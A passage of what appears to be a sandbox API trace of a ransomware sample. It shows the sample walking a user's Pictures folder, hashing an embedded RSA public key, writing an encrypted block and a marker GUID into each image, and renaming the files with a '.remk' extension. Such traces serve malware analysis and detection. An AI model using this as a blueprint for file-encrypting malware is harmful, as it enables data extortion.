[0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.489] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.489] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7b0 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc798 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.490] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.490] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.491] GetCurrentThreadId () returned 0x314 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5be0 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.491] GetCurrentThreadId () returned 0x314 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc798 [0236.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc828 [0236.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7c8 [0236.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.494] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8f3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.494] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.495] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.495] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.495] CloseHandle (hObject=0x640) returned 1 [0236.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.496] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.497] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\EOkvXHoEt.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\eokvxhoet.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\EOkvXHoEt.gif.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\eokvxhoet.gif.remk")) returned 1 [0236.498] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x933e6c40, ftCreationTime.dwHighDateTime=0x1d5e6d2, ftLastAccessTime.dwLowDateTime=0x184872c0, ftLastAccessTime.dwHighDateTime=0x1d5d9ca, ftLastWriteTime.dwLowDateTime=0x184872c0, ftLastWriteTime.dwHighDateTime=0x1d5d9ca, nFileSizeHigh=0x0, nFileSizeLow=0xb193, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GNzXqDyxgLyC07.bmp", cAlternateFileName="GNZXQD~1.BMP")) returned 1 [0236.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.502] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\GNzXqDyxgLyC07.bmp") returned=".bmp" [0236.502] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\GNzXqDyxgLyC07.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\gnzxqdyxglyc07.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.503] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=45459) returned 1 [0236.503] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.506] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb16d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.506] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.508] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xb193, lpOverlapped=0x0) returned 1 [0236.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.509] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.509] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.509] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.510] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.510] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.510] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.510] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.510] GetLastError () returned 0x0 [0236.510] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.510] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.510] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.510] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.510] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.510] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.511] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.512] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb193, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.512] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.512] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.512] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.512] CloseHandle (hObject=0x640) returned 1 [0236.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.514] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0236.514] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0236.514] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\GNzXqDyxgLyC07.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\gnzxqdyxglyc07.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\GNzXqDyxgLyC07.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\gnzxqdyxglyc07.bmp.remk")) returned 1 [0236.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.515] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.515] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.517] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde2e6fc0, ftCreationTime.dwHighDateTime=0x1d5dd13, ftLastAccessTime.dwLowDateTime=0x7510600, ftLastAccessTime.dwHighDateTime=0x1d5daf9, ftLastWriteTime.dwLowDateTime=0x7510600, ftLastWriteTime.dwHighDateTime=0x1d5daf9, nFileSizeHigh=0x0, nFileSizeLow=0x163b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ogT6-r28SnPPl.jpg", cAlternateFileName="OGT6-R~1.JPG")) returned 1 [0236.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.517] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.517] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.517] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\ogT6-r28SnPPl.jpg") returned=".jpg" [0236.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\ogT6-r28SnPPl.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\ogt6-r28snppl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.518] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=91056) returned 1 [0236.518] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.521] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1638a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.521] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.523] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.523] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.523] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x163b0, lpOverlapped=0x0) returned 1 [0236.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.525] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.525] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.525] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.526] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, 